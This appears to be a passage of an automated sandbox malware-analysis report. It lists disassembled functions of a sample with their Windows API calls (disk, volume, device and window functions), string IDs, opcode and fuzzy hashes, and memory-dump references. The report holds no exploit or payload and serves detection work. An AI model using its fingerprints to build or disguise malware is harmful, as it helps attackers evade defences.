                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CapsDevice$CriticalRectSection$ColorCreateEnterFontGdiplusLeaveReleaseStartup
                                                                                                                                                                                                                                                                                                • String ID: 8<$Arial
                                                                                                                                                                                                                                                                                                • API String ID: 3457378621-1936108657
                                                                                                                                                                                                                                                                                                • Opcode ID: c725433711461103541e39f55c0d0007124140c46e9c9449edb99a4a007da462
                                                                                                                                                                                                                                                                                                • Instruction ID: b865aa364f9357de02ae4fe0840df8cdec7f8c78b7ca9b09445c5b8d1f81986b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c725433711461103541e39f55c0d0007124140c46e9c9449edb99a4a007da462
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED8121B09057889EDB70DF2ACC44BCABBE8BF94714F00011FF8489A2A1DBB55604CF99
                                                                                                                                                                                                                                                                                                Function 00423480 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 106windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetSubMenu.USER32(00000010,00000002), ref: 0042352E
                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(BB40E64E), ref: 00423545
                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0042354F
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CursorForegroundMenuWindow
                                                                                                                                                                                                                                                                                                • String ID: 3401016$^H
                                                                                                                                                                                                                                                                                                • API String ID: 390680170-2641057668
                                                                                                                                                                                                                                                                                                • Opcode ID: 06d2a588dec87a76a36fb63f18f7d06653279be6ec553af71c6d46904ea7b1f7
                                                                                                                                                                                                                                                                                                • Instruction ID: a08165e610b34e817a5423f464ddcc9bce1135992548fc6a69cc7effbf604316
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06d2a588dec87a76a36fb63f18f7d06653279be6ec553af71c6d46904ea7b1f7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D31C472304340BBD324DF64D845F6B77A8EB84714F108A2FF50997680DB7DE8448BA9
                                                                                                                                                                                                                                                                                                Function 00455770 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 105COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,0000000C,00000000), ref: 004557C8
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32 ref: 00455855
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DiskFreeInformationSpaceVolume
                                                                                                                                                                                                                                                                                                • String ID: C:\$FAT$FAT16$FAT32$NTFS
                                                                                                                                                                                                                                                                                                • API String ID: 3270478670-3579686192
                                                                                                                                                                                                                                                                                                • Opcode ID: f0af46782a5a30f8442838258ae9688fef8f3122b442d05ec30af96031f478ec
                                                                                                                                                                                                                                                                                                • Instruction ID: 9d95486116a49aac5a83eb76fc3575ce500acb11c4e489ecfb74c34df7f4e439
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0af46782a5a30f8442838258ae9688fef8f3122b442d05ec30af96031f478ec
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65316071A183015BD714EF24DC52B7B7BE4AF88705F44492EF949D6290E638D508CB9B
                                                                                                                                                                                                                                                                                                Function 00454160 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 99fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,00000000,?,?,004543B4,?,00000000,00000000), ref: 004541C4
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32 ref: 00454215
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0045421F
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0045422C
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,BB40E64E,?,00000000,?,?,004543B4,?,00000000,00000000,?,?,?,?,?), ref: 00454273
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                                                                                                • String ID: JD$\\.\C:
                                                                                                                                                                                                                                                                                                • API String ID: 1177325624-1936558939
                                                                                                                                                                                                                                                                                                • Opcode ID: 97f6d277518962508a84672de340e9009c68024a49f3c9384519941a69a054d2
                                                                                                                                                                                                                                                                                                • Instruction ID: 8413255d3e20ee0171831c1fd4e9de5db1cf6cd8e0bd52f5cbead1f2af0ef7cc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97f6d277518962508a84672de340e9009c68024a49f3c9384519941a69a054d2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 943169B1A08310AFD310DF55D884A5BBBE8EBC9758F00492EF948D7351D6749884CB9A
                                                                                                                                                                                                                                                                                                Function 00424270 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 92windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105,BB40E64E,00094638,?,?,00421AA0,BB40E64E), ref: 004242B3
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 004242C5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00425460: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,00000000,?,Button_Check,?,?,00420A23), ref: 004254D9
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000402,?,00000000), ref: 00424398
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: RedrawWindow$MessageSend
                                                                                                                                                                                                                                                                                                • String ID: %s: %I64u $3401050$3401080$8F
                                                                                                                                                                                                                                                                                                • API String ID: 730354411-3927339091
                                                                                                                                                                                                                                                                                                • Opcode ID: 34c2affe364ff515f50bf47c1b61d1c427e18055d02fed05966bd6094f2674e3
                                                                                                                                                                                                                                                                                                • Instruction ID: 8816fc286b8afc534f6afc75fd391673b4d725b22e86aab22ab11b698ddc2395
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34c2affe364ff515f50bf47c1b61d1c427e18055d02fed05966bd6094f2674e3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE3182B1654700ABC310EF25DC42F9B77E8FF84B15F104A1EF59AA21D0DBB8A544CB99
                                                                                                                                                                                                                                                                                                Function 00453220 Relevance: 12.3, APIs: 8, Instructions: 266COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: e733c2cee5cbb5377ac2072c21b29c4e9d8b7a1ab7a7561ec9f277c12a0121fb
                                                                                                                                                                                                                                                                                                • Instruction ID: 04dbbea40edafa167825a5640816ee55d2e105094fff44b6784cacd96e044d36
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e733c2cee5cbb5377ac2072c21b29c4e9d8b7a1ab7a7561ec9f277c12a0121fb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47B136716083409FC310DF69C884A1BFBE9BFC9714F24895EE99887362D774E949CB92
                                                                                                                                                                                                                                                                                                Function 004657C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00467820: DeleteObject.GDI32(00000000), ref: 00467935
                                                                                                                                                                                                                                                                                                • GdiplusShutdown.GDIPLUS(?,?,BB40E64E,00093C38,?,?,00093E00,?,00000000,0047812F,000000FF,0041A4F1,BB40E64E,00093C38,?,00093E00), ref: 00465814
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004658CF
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00465921
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00465973
                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004659C5
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DeleteObject$GdiplusShutdown
                                                                                                                                                                                                                                                                                                • String ID: 8K
                                                                                                                                                                                                                                                                                                • API String ID: 1337965791-3211281232
                                                                                                                                                                                                                                                                                                • Opcode ID: 3a50086e46136d6d50168286cddb443a9cc0a0107472165b4ab84f4d896fe486
                                                                                                                                                                                                                                                                                                • Instruction ID: 5b8780734ed73be5f4f2893b0bea8a6c3b62fc8eaf033f1e837d6edea0f0e4aa
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a50086e46136d6d50168286cddb443a9cc0a0107472165b4ab84f4d896fe486
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8361E6B0505F409FC360DF3A9880B9BFBE4BB48305F90492EE1AE93241DB796548CF5A
                                                                                                                                                                                                                                                                                                Function 004293B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 129windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ActiveMessageWindow
                                                                                                                                                                                                                                                                                                • String ID: 3400001$3400101$3401090$rY
                                                                                                                                                                                                                                                                                                • API String ID: 3610105657-3605576623
                                                                                                                                                                                                                                                                                                • Opcode ID: 5932f68488161c627aebd4246385e4a992ea64bdc1114815fce31a9279d2be1f
                                                                                                                                                                                                                                                                                                • Instruction ID: 6a8541e3f689305ec2f6cb5d2be3b4f28d8c1de2ea2bbd417e2b40b4f34285ca
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5932f68488161c627aebd4246385e4a992ea64bdc1114815fce31a9279d2be1f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B44193B1704210ABD710EB65EC45BAB73A8AF94704F40892FF90ED2290DB78ED45C76D
                                                                                                                                                                                                                                                                                                Function 005FD940 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 005FD977
                                                                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 005FD97F
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 005FDA08
                                                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 005FDA33
                                                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 005FDA88
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                • Opcode ID: 4864904ac64cda9a927aff4a51afae6c5f1078354c3c70f1066ae3651d2a4d7e
                                                                                                                                                                                                                                                                                                • Instruction ID: c3ed1502691b9c8b972983a24ed3c6198c6f2432814e13c286f68de9a2a10917
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4864904ac64cda9a927aff4a51afae6c5f1078354c3c70f1066ae3651d2a4d7e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9541A134A0020DAFCF10DF68C885ABEBFB7BF45314F148055EA55AB392D7799A11CBA1
                                                                                                                                                                                                                                                                                                Function 00467490 Relevance: 10.6, APIs: 7, Instructions: 118windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004674EB
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 004674FB
                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0046751B
                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0046752A
                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00467561
                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0046758A
                                                                                                                                                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 004675DC
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreateParentRect$BitmapClientWindow
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1335343179-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ae058cf5547a5b73137727556229a9f4d12eeb23d99a6f799289078dd219408d
                                                                                                                                                                                                                                                                                                • Instruction ID: ec974f87df7e9fb3a3618fae45b6badb24d167debaf80877d84b9ed91747ca3a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae058cf5547a5b73137727556229a9f4d12eeb23d99a6f799289078dd219408d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D411AB1508740AFC315DF68C985E5BBBE8FBD8714F008A1EF59A93290DB74E844CB66
                                                                                                                                                                                                                                                                                                Function 0042E730 Relevance: 10.6, APIs: 7, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _TrackMouseEvent.COMCTL32(00000010), ref: 0042E774
                                                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 0042E7A7
                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0042E7C2
                                                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 0042E7FC
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,?,00000000,00000105), ref: 0042E821
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,?,00000000,00000105), ref: 0042E83C
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0042E84F
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
